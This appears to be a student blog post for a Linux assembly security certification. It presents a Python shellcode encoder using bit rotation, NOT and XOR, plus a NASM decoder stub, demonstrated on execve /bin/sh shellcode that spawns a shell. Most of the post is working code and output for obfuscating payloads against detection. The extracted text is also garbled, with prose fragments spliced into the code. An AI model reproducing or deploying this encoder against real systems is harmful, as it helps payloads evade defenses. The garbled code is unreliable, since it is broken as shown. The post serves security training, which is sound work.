This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert Certification:
Student ID: PA-30398
For this assignment, I uploaded the following files inside the folder assignment/4: Python encoder using ROR/ROL-NOT-XOR instructions
decoder.nasm: Assembly decoder for the encoder above
I tried to think of an encoder that uses just a few mathematical operations and that's not too obvious like XOR encoders.
My implementation looks like this:
times using ROR (Right Rotation)ROT_ODD
times using ROL (Left Rotation)NOT
, made up of 2 bytes)The encoded shellcode (with the prepended auxiliary bytes) should look like this:
Follows the python code that reads the shellcode stored inside --input
, encodes it according to the previous scheme, and saves it into --output
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-i", "--input", help="File containing shellcode to encode", required=True)
parser.add_argument("-o", "--output", help="Store the encoded shellcode in this file", required=False)
args = parser.parse_args()
input_file = args.input
output_file = args.output
shellcode = read_shellcode(input_file)
encoded_shellcode = manage_shellcode_encoding(input_file, output_file)
assert shellcode == manage_shellcode_decoding(encoded_shellcode)
After the shellcode is encoded, the program asserts
whether the decoded version is correct.
def encode_shellcode(shellcode: bytes) -> bytes:
encoded_shellcode = bytearray()
print(f"[+] Original non-encoded shellcode (HEX): {shellcode.hex()}")
shellcode_length_least_byte = len(shellcode) % 256
shellcode_length_most_byte = len(shellcode) // 256
ROT_EVEN, ROT_ODD = gen_random_rotations(ms_byte=shellcode_length_most_byte, ls_byte=shellcode_length_least_byte)
shellcode_length_least_byte = shellcode_length_least_byte ^ ROT_EVEN
shellcode_length_most_byte = shellcode_length_most_byte ^ ROT_ODD
The Least/Most Significant Bytes are XOR-ed with ROT_EVEN
in order to avoid null bytes, e.g. shellcode of 256 bytes -> 0x0100
print(f"[+] Rotations for even-index bytes: {ROT_EVEN} (hex: {hex(ROT_EVEN)})")
print(f"[+] Rotations for odd-index bytes: {ROT_ODD} (hex: {hex(ROT_ODD)})")
print(f"[+] Least Significant Byte of Shellcode Length XOR-ed with ROT_EVEN: {shellcode_length_least_byte} (hex: {hex(shellcode_length_least_byte)})")
print(f"[+] Most Significant Byte of Shellcode Length XOR-ed with ROT_ODD: {shellcode_length_most_byte} (hex: {hex(shellcode_length_most_byte)})")
Some auxiliary bytes are prepended to the encoded shellcode, in order for the decoder stub to decode it.
print(f"[+] Helper bytes for decoding (HEX): {encoded_shellcode.hex()}")
# 1. Rotate bytes
# 1.1. EVEN index -> Rotate to the Right ROT_EVEN times
# 1.2. ODD index -> Rotate to the Left ROT_ODD times
# 2. NOT each byte
# 3. XOR each byte with the Least Significant Byte of the shellcode length
# (shellcode_length_least_byte), which is XOR-ed with ROT_EVEN to avoid null_bytes
print(f"\n[#] Encoding ...")
for index, byte in enumerate(shellcode):
if index % 2 == 0:
# even index byte
# print(f"[+] EVEN | Original byte: {hex(byte)}")
encoded_byte = bitwise_ror(byte, ROT_EVEN, 8)
# print(f"[+] EVEN | Rotated byte: {hex(encoded_byte)}")
encoded_byte = bitwise_not(encoded_byte)
# print(f"[+] EVEN | NOT-ed byte: {hex(encoded_byte)}")
functions are taken from Technological Masochism if shellcode_length_least_byte != encoded_byte:
encoded_byte ^= shellcode_length_least_byte
# print(f"[+] EVEN | Xored byte: {hex(encoded_byte)}\n")
-ing bytes equal to shellcode_length_least_byte
, as it would result in NULL
bytes else:
# odd index byte
# print(f"[+] ODD | Original byte: {hex(byte)}")
encoded_byte = bitwise_rol(byte, ROT_ODD, 8)
# print(f"[+] ODD | Rotated byte: {hex(encoded_byte)}")
encoded_byte = bitwise_not(encoded_byte)
# print(f"[+] ODD | NOT-ed byte: {hex(encoded_byte)}")
if shellcode_length_least_byte != encoded_byte:
encoded_byte ^= shellcode_length_least_byte
# print(f"[+] ODD | Xored byte: {hex(encoded_byte)}\n")
assert 0x00 not in encoded_shellcode
return encoded_shellcode
bytes are present in the encoded shellcodeI ran the script multiple times with larger shellcodes, so I'm pretty sure (like ~98%) that the encoded shellcode won't contain NULL
The full script is stored on GitHub at rbctee/SlaeExam.
Inside the previous python
script I also implemented a function that decodes the encoded shellcode:
def decode_shellcode(encoded_shellcode: bytes) -> bytes:
decoded_shellcode = bytearray()
ROT_EVEN, ROT_ODD = encoded_shellcode[:2]
shellcode_length_least_byte = encoded_shellcode[2]
shellcode_length_most_byte = encoded_shellcode[3]
encoded_shellcode_main = encoded_shellcode[4:]
print(f"\n[#] Decoding ...")
for index, encoded_byte in enumerate(encoded_shellcode_main):
if index % 2 == 0:
if encoded_byte != shellcode_length_least_byte:
decoded_byte = encoded_byte ^ shellcode_length_least_byte
. Moreover, if the encoded byte is equal to the Least Significant Byte
of the shellcode length, then ignore it else:
decoded_byte = encoded_byte
decoded_byte = bitwise_not(decoded_byte)
decoded_byte = bitwise_rol(decoded_byte, ROT_EVEN, 8)
if encoded_byte != shellcode_length_least_byte:
decoded_byte = encoded_byte ^ shellcode_length_least_byte
decoded_byte = encoded_byte
decoded_byte = bitwise_not(decoded_byte)
decoded_byte = bitwise_ror(decoded_byte, ROT_ODD, 8)
print(f"[+] Decoded shellcode (HEX): {decoded_shellcode.hex()}")
return decoded_shellcode
For every byte of the encoded shellcode, the function does the following:
each byte with the value of shellcode_length_least_byte
, made exception for bytes equal to itNOT
each byteeven
, then rotate to the left (ROL
, then rotate to the right (ROR
timesOnce you execute the script, it shows how to use it:
python3 -h
# usage: [-h] -i INPUT [-o OUTPUT]
# optional arguments:
# -h, --help show this help message and exit
# -i INPUT, --input INPUT
# File containing shellcode to encode
# -o OUTPUT, --output OUTPUT
# Store the encoded shellcode in this file
If you pass the correct arguments, in encodes your shellcode and asserts
that it can be decoded correctly:
echo "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\xb0\x0b\x89\xe3\x8d\x4c\x24\x08\x8d\x54\x24\x08\xcd\x80" > shellcode.bin
python3 -i ./shellcode.bin -o /tmp/encoded.binc
# [+] Non-encoded shellcode (HEX): 31c050686e2f7368682f2f6269b00b89e38d4c24088d542408cd800a
# [+] Non-encoded shellcode length: 28 bytes
# [+] Rotations for even-index bytes: 2 (hex: 0x2)
# [+] Rotations for odd-index bytes: 168 (hex: 0xa8)
# [+] Least Significant Byte of Shellcode Length XOR-ed with ROT_EVEN: 30 (hex: 0x1e)
# [+] Most Significant Byte of Shellcode Length XOR-ed with ROT_ODD: 168 (hex: 0xa8)
# [+] Helper bytes for decoding (HEX): 02a81ea8
# [#] Encoding ...
# [+] Encoded shellcode (HEX): 02a81ea8ad21f5897ace3d89fbce2a83bb512368196cf2c5e36cf4c5e32cc1eb
# [+] Encoded shellcode length: 32 bytes
# [+] Assembly data: 0x2,0xa8,0x1e,0xa8,0xad,0x21,0xf5,0x89,0x7a,0xce,0x3d,0x89,0xfb,0xce,0x2a,0x83,0xbb,0x51,0x23,0x68,0x19,0x6c,0xf2,0xc5,0xe3,0x6c,0xf4,0xc5,0xe3,0x2c,0xc1,0xeb
# [#] Decoding ...
# [+] Decoded shellcode (HEX): 31c050686e2f7368682f2f6269b00b89e38d4c24088d542408cd800a
The line starting with Assembly data: contains the bytes you can copy-paste into the NASM skeleton file and use them with the JMP-CALL-POP
# [+] Assembly data: 0x2,0xa8,0x1e,0xa8,0xad,0x21,0xf5,0x89,0x7a,0xce,0x3d,0x89,0xfb,0xce,0x2a,0x83,0xbb,0x51,0x23,0x68,0x19,0x6c,0xf2,0xc5,0xe3,0x6c,0xf4,0xc5,0xe3,0x2c,0xc1,0xeb
The first step is to prepare the skeleton (i.e. a generic template) of the decoder.
I used the same shown in the Episode 31
of the course, employed in conjunction with the Insertion
; Author: Robert C. Raducioiu (rbct)
global _start
section .text
xor ebx
mul ebx
jmp short CallShellcode
pop esi
; ...
jmp short Decode
call Shellcode
encoded: db 0x2,0xa8,0x1e,0xa8,0xad,0x21,0xf5,0x89,0x7a,0xce,0x3d,0x89,0xfb,0xce,0x2a,0x83,0xbb,0x51,0x23,0x68,0x19,0x6c,0xf2,0xc5,0xe3,0x6c,0xf4,0xc5,0xe3,0x2c,0xc1,0xeb
shellcode decoder templateAs you can see, it is based on the famous JMP-CALL-POP
technique in order to get a reference to the shellcode.
I chose to use this because the other one I knew (pushing groups of 4
bytes on the stack) would increase the size of the shellcode.
Anyways, now the routine Decode
must be implemented to decode the encoded shellcode.
As mentioned previously, the first decoding operation is the following:
each byte with the value ofshellcode_length_least_byte
, made exception for bytes equal to it
; clear some registers for later use
xor ebx, ebx
mul ebx
mov ecx, eax
jmp short CallShellcode
; get a reference to the encoded shellcode
pop esi
; copy the address of the first encoded assembly instruction into EBX
; +4 -> skip the first 4 auxiliary bytes
lea ebx, [esi+4]
; copy ROT_EVEN and ROT_ODD into AX
mov ax, WORD [esi]
; copy the XOR-ed length of the shellcode into CX
; and XOR it again with ROT_EVEN:ROT_ODD to decode it
mov cx, WORD [esi+2]
xor cx, ax
; copy the length of the shellcode on the stack, for later use
push ecx
; copy the length of the shellcode (previous 'push ecx') into DL
; and check if the two bytes are the same
mov dl, [esp]
cmp dl, BYTE [ebx]
; if they are equal jump to the next decoding operation: NOT
je NotDecode
; if they aren't the equal, then XOR the byte with 'shellcode_length_least_byte'
; which is the length of the shellcode XOR-ed with ROT_EVEN
mov dl, [esi+2]
xor BYTE [ebx], dl
) or move to the next one, based on the commented conditionCallShellcode:
call Shellcode
encoded: db 0x2,0xa8,0x1e,0xa8,0xad,0x21,0xf5,0x89,0x7a,0xce,0x3d,0x89,0xfb,0xce,0x2a,0x83,0xbb,0x51,0x23,0x68,0x19,0x6c,0xf2,0xc5,0xe3,0x6c,0xf4,0xc5,0xe3,0x2c,0xc1,0xeb
Now that the first operation is done, it's time to move to the second one:
mov dl, [esp]
cmp dl, BYTE [ebx]
je NotDecode
mov dl, [esi+2]
xor BYTE [ebx], dl
not BYTE [ebx]
This one is very straightforward: based on the Decode routine I've already shown, if the current byte and the one known as shellcode_length_least_byte
are equal, it jumps to NoteDecode
in order to perform the NOT
After that, the shellcode has to perform the third decoding operation:
- Rotate bytes
- if the index of the byte is
, then rotate to the left (ROL
times- if the index of the byte is
, then rotate to the right (ROR
Follows the assembly code of interest:
; save EBX before overwriting it
push ebx
; check if the index is EVEN or ODD
; Math logic:
; - EBX - ESI = 4 + current_byte_index
; - if the Least Significant Bit is 1, then it is ODD
; - use test to set the ZF flag if the index is ODD
sub ebx, esi
test bl, 1
; restore EBX and load the byte into DL
pop ebx
mov dl, BYTE [ebx]
; if the ZF flag is set, the index is ODD
jnz RotateOdd
, then sets the ZF
flag accordinglyRotateEven:
; Rotate the byte ROT_EVEN times
mov cl, al
rol dl, cl
jmp short AfterRotateByte
; rotate the byte ROT_ODD times
mov cl, ah
ror dl, cl
; replace the original rotated byte with the decoded one
mov BYTE [ebx], dl
; decrease the loop counter (size of the shellcode)
dec WORD [esp]
; if the loop counter reaches 0, then jump to the decoded shellcode, skipping the auxiliary bytes
jz encoded+4
; increase the offset of the next byte to be decoded, and jump to decode it
inc ebx
jmp short Decode
The full program can be found here.
I used the following commands to confirm it works correctly:
rbct@slae:~$ vim decoder.nasm
rbct@slae:~$ nasm -f elf32 decoder.nasm
rbct@slae:~$ ld -N -o decoder decoder.o
rbct@slae:~$ ./decoder
$ whoami
# rbct
$ id
# uid=1000(rbct) gid=1000(rbct) groups=1000(rbct),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),111(lpadmin),112(sambashare)
$ exit
Among the drawbacks of this approach, the length of the decoder stub is quite apparent.
Considering the length of the original shellcode is 28
bytes, and the length of the full shellcode is 106
bytes, that means the decode stub uses 78
bytes, which is like 3x
times the length of the original shellcode.
Although it may not be optimal for small shellcode, it can be useful for bigger shellcodes.